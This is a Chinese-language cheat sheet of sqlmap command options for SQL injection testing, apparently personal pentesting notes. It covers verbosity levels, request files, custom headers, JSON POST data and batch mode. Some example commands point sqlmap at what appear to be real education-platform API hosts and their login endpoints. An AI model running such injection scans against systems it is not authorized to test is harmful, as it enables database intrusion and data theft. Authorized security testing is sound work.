-v #详细的等级(0-6)
0:只显示Python的回溯,错误和关键消息。
1:显示信息和警告消息。
2:显示调试消息。
3:有效载荷注入。
4:显示HTTP请求。
5:显示HTTP响应头。
6:显示HTTP响应页面的内容
例子: sqlmap.py -u "http://www.evil0x.com/ test.php?" p=2 -v4 -v6
带上请求头和请求参数进行测试的方法 . (用这个测比较方便)
例子: sqlmap.py -r /Users/lucax/Desktop/123.txt -v4 -v6
123.txt 格式: #文件里面的内容可以把请求头需要的都放进里面去,如get请求要token的值
POST /system/login HTTP/1.1
Host: ai-manage-api-edu.ree.cn
{"username":"admin","password":"123456","captcha":""}
制定需要注入的字段(下面是制定了 name和 paward 字段)
请求的参数: {"username":"admin","password":"123456","captcha":""}
例子: sqlmap.py -u http://www.evil0x.com/login -p "name,paward"
命令行指定url的 请求头
sqlmap.py -u "https://manage-api-edu.yoyo.cn/teacher?keyword=123" --headers "authorization: Bearer"
注意:
--headers "Content-Type:application/json User-Agent:Mozilla/5.0“
把要测的url都放到一个text文件里面,一个一个去测试
python sqlmap.py -m url.txt
命令行指定请求方式
--method=PUT
命令行指定data的请求参数
例子: sqlmap.py -u "http://192.168.56.102:8080/user.php" --data="id=0&name=werner"
sqlmap.py -u "https://manage-api-edu.yoyo.cn/system/login" --data="{"username": "猫老祖不是我","password": "123"}"
--batch 从不询问用户输入,使用所有默认配置 就是所有可输入值的字段都执行一遍,不加没跑完一个值就会询问一次
命令行加请求头的方法 --headers=HEADERS 换行分开,加入其他的HTTP头 也是表示换行的意思
sqlmap.py -u "manage-api-edu.yoyo.cn/teacher?keyword=123" --headers "authorization: 123 /n uuur:666" -v4 -v6
注入等级
--level=3
踩坑:
有时只需要加上网站地址 sqlmap.py -u "www.baidu.com" 即可
不然会报错 SSL connection error occurred 的错误